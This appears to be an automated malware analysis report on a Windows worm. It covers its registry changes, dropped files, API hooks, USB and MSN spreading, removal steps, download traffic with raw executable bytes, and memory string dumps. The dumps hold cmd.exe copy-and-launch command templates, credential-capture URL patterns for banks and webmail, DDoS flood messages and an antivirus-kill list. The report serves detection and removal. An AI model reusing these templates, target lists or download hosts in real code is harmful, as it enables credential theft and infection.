[HKCU\Software\Win7zip]
"uuid" = "6F 9A 57 53 0A 29 1B 4E BE 6B 6A D9 6F E7 5E 1E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lgzovpzqe.exe]
"DisableExceptionChainValidation" = ""

[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"BID" = "20 00 08 00 13 00 06 00 DE 07 00 00 14 00 88 FF"

Dropped PE files

MD5	File path
830da209ecc9fb980d35ba8d2e61bb27	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Worm installs the following user-mode hooks in WININET.dll:

HttpSendRequestW
InternetWriteFile
HttpSendRequestA

The Worm installs the following user-mode hooks in DNSAPI.dll:

DnsQuery_A
DnsQuery_W

The Worm installs the following user-mode hooks in WS2_32.dll:

send
GetAddrInfoW

The Worm installs the following user-mode hooks in kernel32.dll:

MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA

The Worm installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672
Delete the original Worm file.
Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.10.0
Legal Copyright: Copyright (c) 2000-2004 Oleh Yuschuk
Legal Trademarks:
Original Filename:
Internal Name: OllyDbg
File Version: 1.0.10.0
File Description: OllyDbg, 32-bit analysing debugger
Comments:
Language: Language Neutral

Company Name: Product Name: Product Version: 1.0.10.0Legal Copyright: Copyright (c) 2000-2004 Oleh YuschukLegal Trademarks: Original Filename: Internal Name: OllyDbgFile Version: 1.0.10.0File Description: OllyDbg, 32-bit analysing debuggerComments: Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	40083	40448	4.52037	3968259063d25d635df3bc4a5234b1b8
.rdata	45056	14292	14336	3.63511	2ddde80c1d07fe980d71d92932333fc0
.data	61440	14180	6656	4.27116	b2d13cdfd2b27a256886545f3f3b11c7
.rsrc	77824	35156	35328	4.78522	92d80d4490430c356f5bb6edf9e29c21

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://dl.dqwjnewkwefewamail.com/bet.exe	54.193.9.202
hxxp://dl.dqwjnewkwefewamail.com/ng.exe	54.193.9.202

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /bet.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dl.dqwjnewkwefewamail.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 19 Jun 2014 16:43:30 GMT

Server: Apache/2.2.27 (Amazon)

Last-Modified: Thu, 19 Jun 2014 14:49:25 GMT

ETag: "20f74-4c200-4fc317ba75165"

Accept-Ranges: bytes

Content-Length: 311808

Connection: close

Content-Type: application/octet-stream

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............;........d.......d?......d).........u....d9......N.......N>......N;.....Rich....................PE..L......S.............................#....... ....@.........................................................................L...<.......................................................................@............ ...............................text............................... ..`.rdata...z... ...|..................@..@.data....M......."..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....0.E......E......E.Pjd.4.......E..}..u.h`"A..>..........>....E.3..u...u..M.Q.U.Rh."A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q.........U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E..}..u..........M.Q.D......j.h."A.h."A.h."A.h."A.j...."A.......E...A....#A..]....#A..].....E...$....E...$.E.......].....E...$....E...$....E...$h."A..l.......U.3...]...............U......E...$....E...$.,......]..U...............................................................x...

<<< skipped >>>

GET /ng.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dl.dqwjnewkwefewamail.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 19 Jun 2014 16:45:16 GMT

Server: Apache/2.2.15 (CentOS)

Last-Modified: Thu, 19 Jun 2014 13:46:51 GMT

ETag: "603d8-37a00-4fc309be5c8c0"

Accept-Ranges: bytes

Content-Length: 227840

Connection: close

Content-Type: application/octet-stream

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............;........d.......d?......d).........s....d9......N.......N>......N;.....Rich....................PE..L......S.....................n.......#....... ....@.........................................................................<...<.......`...............................................................@............ ...............................text............................... ..`.rdata...y... ...z..................@..@.data....M......."..................@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....0.E......E......E.Pjd.4.......E..}..u.hP"A..>..........>....E.3..u...u..M.Q.U.Rht"A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q.........U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E..}..u..........M.Q.D......j.hq"A.hr"A.hs"A.h."A.j...."A.......E...A....#A..]...."A..].....E...$....E...$.E.......].....E...$....E...$....E...$h."A..l.......U.3...]...............U......E...$....E...$.,......]..U...............................................................x

<<< skipped >>>

Map

The Worm connects to the servers at the folowing location(s):

Strings from Dumps

svchost.exe_884:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

svchost.exe_884_rwx_00090000_00029000:

.text

`.data

.rsrc

@.reloc

*windows defender*

*windowsupdate*

*drweb*

dwwin.exe

kernel32.dll

iphlpapi.dll

GetExtendedTcpTable

GetOwnerModuleFromTcpEntry

%systemroot%

%programfiles%\Common Files\*\*.exe

%appdata%\Identities\*.exe

%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe

ole32.dll

/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"

/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe

%SystemRoot%\system32\SHELL32.dll

%s\c731200

%s\%s

%s\%s.lnk

Windows_Shared_Mutex_231_c000100

ntdll.dll

\ScreenSaverPro.scr

\temp.bin

user32.dll

advapi32.dll

shell32.dll

urlmon.dll

wininet.dll

gdi32.dll

rpcrt4.dll

netapi32.dll

*.exe

.gonewiththewings

*.gonewiththewings

WinExec

URLDownloadToFileA

http://www.google.com

\calc.exe

\Reader_sl.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

notepad.exe

\notepad.exe

\svchost.exe

WindowsId

Identities\%s

%s\%s\%s.exe

:Zone.Identifier

.quarantined

"%s" -shell

"%s" -bind

userinit.exe

explorer.exe

Windows critical error, require reboot

Windows Update

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

GetProcessHeap

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteExW

SHELL32.dll

SetTcpEntry

SHLWAPI.dll

RPCRT4.dll

NETAPI32.dll

DNSAPI.dll

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Software\WindowsId Manager Reader

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunOnce

WindowsMark

m1xg.org

mxxtxxt.biz

meob.me

%System%\notepad.exe

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0A

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

%s_%d

-%sMutex

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

URLDownloadToFileW

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

Secur32.dll

ShellExecuteA

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

WS2_32.dll

MSVCRT.dll

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

RegNotifyChangeKeyValue

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

7 767<7~7

8*808;8~8

{A5DCBF10-6530-11D2-901F-00C04FB951ED}

shlwapi.dll

crypt32.dll

wtsapi32.dll

samcli.dll

netutils.dll

userenv.dll

WindowsSecondaryDesktop

\charmap.exe

\Windows Media Player\wmprph.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

Aadvapi32.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

svchost.exe_884_rwx_000C0000_00027000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

svchost.exe_884_rwx_000E8000_00072000:

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

.text

`.rdata

@.data

.rsrc

This pointer, %d, is aligned on %d

This pointer, %d, is not aligned on %d

%f, %f and %f form a right-angled triangle.

Invalid parameter passed to C runtime function.

?#%X.y

%S#[k

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

ShellExecuteA

SHELL32.dll

GetCPInfo

GetWindowsDirectoryA

CreatePipe

GetWindowsDirectoryW

GetConsoleOutputCP

KERNEL32.dll

.VI3xqr

zcÁ

Udp?iw0

/#"%f

P.oUw

B%Su[

Rkka.by

.dYi'

p.Cvq

.EU{%

D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>